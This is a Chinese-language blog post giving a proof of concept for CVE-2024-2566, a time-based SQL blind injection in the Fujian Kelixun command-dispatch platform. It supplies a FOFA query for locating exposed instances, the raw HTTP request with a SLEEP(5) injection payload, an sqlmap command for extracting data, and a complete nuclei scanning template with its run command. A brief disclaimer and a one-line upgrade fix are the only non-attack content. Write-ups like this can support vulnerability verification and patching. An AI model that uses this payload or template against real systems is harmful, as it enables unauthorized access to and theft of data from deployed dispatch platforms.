CVE-2024-2566漏洞复现（poc）

Administrator 字数: 4605 阅读耗时: 11 分钟 2024/06/24 博客独享热度: 196 评论: 0

免责申明：本文内容为学习笔记分享，仅供技术学习参考，请勿用作违法用途，任何个人和组织利用此文所提供的信息而造成的直接或间接后果和损失，均由使用者本人负责，与本博客和发布者无关！！！

漏洞名称

福建科立讯通信指挥调度平台get_extension_yl.php sql注入漏洞

漏洞影响

科立讯通信调度平台 <= 20240313

漏洞描述

福建科立讯通信指挥调度平台get_extension_yl.php 接口存在SQL盲注漏洞，未授权的攻击者可以远程利用漏洞获取数据，从而造成数据泄露。

FOFA搜索语句

body="app/structure/departments.php"||app="指挥调度管理平台"

漏洞复现

向靶场发送如下数据包

GET /api/client/get_extension_yl.php?imei=1%27%20AND%20(SELECT%207545%20FROM%20(SELECT(SLEEP(5)))Zjzw)%20AND%20%27czva%27=%27czva&timestamp=1&sign=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: authcode=h8g9
Upgrade-Insecure-Requests: 1

响应内容如下

漏洞复现成功

使用sqlmap获取数据

sqlmap -u "http://x.x.x.x/api/client/get_extension_yl.php?imei=1&timestamp=1&sign=1"

nuclei poc

nuclei poc文件内容如下


id: CVE-2024-2566

info:
  name: 福建科立讯通信指挥调度平台get_extension_yl.php sql注入漏洞
  author: fgz
  severity: high
  description: '福建科立讯通信指挥调度平台get_extension_yl.php 接口存在SQL盲注漏洞，未授权的攻击者可以远程利用漏洞获取数据，从而造成数据泄露。'
  tags: cve,cve-2024,sqli
  metadata:
    max-request: 1
    fofa-query: body="app/structure/departments.php" || app="指挥调度管理平台"
    verified: true

requests:
  - raw:
      - |-
        GET /api/client/get_extension_yl.php?imei=1%27%20AND%20(SELECT%207545%20FROM%20(SELECT(SLEEP(5)))Zjzw)%20AND%20%27czva%27=%27czva&timestamp=1&sign=1 HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
        Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
        Accept-Encoding: gzip, deflate, br
        Connection: close
        Cookie: authcode=h8g9
        Upgrade-Insecure-Requests: 1

    matchers:
      - type: dsl
        dsl:
          - "status_code == 200 && duration>=5 && duration<=6 && contains(body,'msg')"

运行POC

nuclei.exe -t mypoc/cve/CVE-2024-2566.yaml -u http://x.x.x.x

修复建议

升级到最新版本。